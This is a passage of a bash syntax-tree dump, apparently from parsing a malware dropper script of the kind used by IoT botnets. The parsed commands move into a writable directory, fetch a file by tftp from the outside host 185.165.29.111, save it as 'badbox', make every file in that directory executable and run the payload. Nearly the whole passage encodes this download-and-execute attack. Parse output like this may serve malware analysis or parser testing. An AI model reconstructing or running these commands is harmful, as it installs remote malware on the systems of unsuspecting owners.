  CommandNode(lineno=15, pos=(1478, 1486), parts=[
    WordNode(lineno=15, pos=(1478, 1486), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1487, 1607), parts=[
  CommandNode(lineno=16, pos=(1487, 1494), parts=[
    WordNode(lineno=16, pos=(1487, 1489), word='cd'),
    WordNode(lineno=16, pos=(1490, 1494), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1495, 1497)),
  CommandNode(lineno=16, pos=(1498, 1509), parts=[
    WordNode(lineno=16, pos=(1498, 1500), word='cd'),
    WordNode(lineno=16, pos=(1501, 1509), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1510, 1512)),
  CommandNode(lineno=16, pos=(1513, 1520), parts=[
    WordNode(lineno=16, pos=(1513, 1515), word='cd'),
    WordNode(lineno=16, pos=(1516, 1520), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1521, 1523)),
  CommandNode(lineno=16, pos=(1524, 1532), parts=[
    WordNode(lineno=16, pos=(1524, 1526), word='cd'),
    WordNode(lineno=16, pos=(1527, 1532), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1533, 1535)),
  CommandNode(lineno=16, pos=(1536, 1540), parts=[
    WordNode(lineno=16, pos=(1536, 1538), word='cd'),
    WordNode(lineno=16, pos=(1539, 1540), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1540, 1541)),
  CommandNode(lineno=16, pos=(1542, 1571), parts=[
    WordNode(lineno=16, pos=(1542, 1546), word='tftp'),
    WordNode(lineno=16, pos=(1547, 1549), word='-r'),
    WordNode(lineno=16, pos=(1550, 1553), word='tel'),
    WordNode(lineno=16, pos=(1554, 1556), word='-g'),
    WordNode(lineno=16, pos=(1557, 1571), word='185.165.29.111'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1571, 1572)),
  CommandNode(lineno=16, pos=(1572, 1587), parts=[
    WordNode(lineno=16, pos=(1572, 1575), word='cat'),
    WordNode(lineno=16, pos=(1576, 1579), word='tel'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1581, 1587), word='badbox'), pos=(1580, 1587), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1587, 1588)),
  CommandNode(lineno=16, pos=(1588, 1598), parts=[
    WordNode(lineno=16, pos=(1588, 1593), word='chmod'),
    WordNode(lineno=16, pos=(1594, 1596), word='+x'),
    WordNode(lineno=16, pos=(1597, 1598), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1598, 1599)),
  CommandNode(lineno=16, pos=(1599, 1607), parts=[
    WordNode(lineno=16, pos=(1599, 1607), word='./badbox'),
  ]),
])
